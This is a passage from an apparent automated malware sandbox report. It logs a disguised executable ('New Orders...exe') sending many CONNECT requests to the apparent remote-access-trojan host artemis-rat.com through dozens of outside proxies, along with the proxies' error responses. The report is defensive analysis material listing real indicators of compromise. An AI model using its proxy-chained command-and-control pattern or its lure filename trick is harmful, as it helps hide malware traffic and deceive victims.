65 72 2c 20 61 6e 64 20 3c 4c 49 3e 20 53 53 4c 42 20 69 73 20 64 69 73 61 62 6c 65 64 20 3c 2f 55 4c 3e 3c 50 3e 20 54 6f 20 63 6f 72 72 65 63 74 20 74 68 69 73 20 70 72 6f 62 6c 65 6d 2c 20 79 6f 75 20 6d 75 73 74 20 72 65 6d 6f 76 65 20 74 68 65 20 70 72 6f 78 79 20 73 65 74 74 69 6e 67 73 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 50 3e 3c 2f 66 6f 6e 74 3e
                                                                                        Data Ascii: <TITLE>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</TITLE><B><font face=arial color=#3642a2>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</font></B><font style=normal face=arial size=2px><P>The Web Acceleration Client does not support secure requests (HTTPS) from a browser when: <P> <UL><LI> The browser is proxied to Web Acceleration Client for secure requests (HTTPS), and <LI> The Web Acceleration Client is not configured with a proxy server, and <LI> SSLB is disabled </UL><P> To correct this problem, you must remove the proxy settings from your browser.</P></font>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1822192.168.2.951470201.71.3.529997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.442231894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445346117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.806166887 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1823192.168.2.95162550.63.12.10135807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.449153900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.460933924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.461208105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.476699114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.476279974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.476289034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1824192.168.2.95426988.202.230.10388967672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.449502945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632450104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633187056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.633251905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.742031097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.741899014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.741924047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.820106030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.972143888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1825192.168.2.95144647.243.177.21080887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.451592922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.722323895 CET325INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1826192.168.2.951612124.158.186.25480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.461227894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632551908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633210897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.633352041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1827192.168.2.953990198.8.84.341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.461487055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1828192.168.2.95159520.219.177.7331297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.467879057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.676165104 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1829192.168.2.95504874.119.144.6041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.483692884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1830192.168.2.95434847.184.175.16431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.483788967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.676243067 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                        Server: squid/4.14
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3846
                                                                                        X-Squid-Error: ERR_DNS_FAIL 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1831192.168.2.951741165.22.96.6831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.484627008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.570221901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.570513964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1832192.168.2.954503208.102.51.6582087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.485548019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1833192.168.2.954268105.235.197.162540667672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.485668898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1834192.168.2.95431082.113.157.122312807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.487066984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1835192.168.2.951903212.118.43.143807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.487257004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.923233986 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:58 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1836192.168.2.95175137.187.77.58144707672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.487416983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1837192.168.2.952041162.241.46.6460977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.487611055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.070236921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.773377895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.964751005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.476521015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.273441076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.773140907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1838192.168.2.95240824.249.199.441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.550550938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1839192.168.2.951719148.66.130.53542097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.550637007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
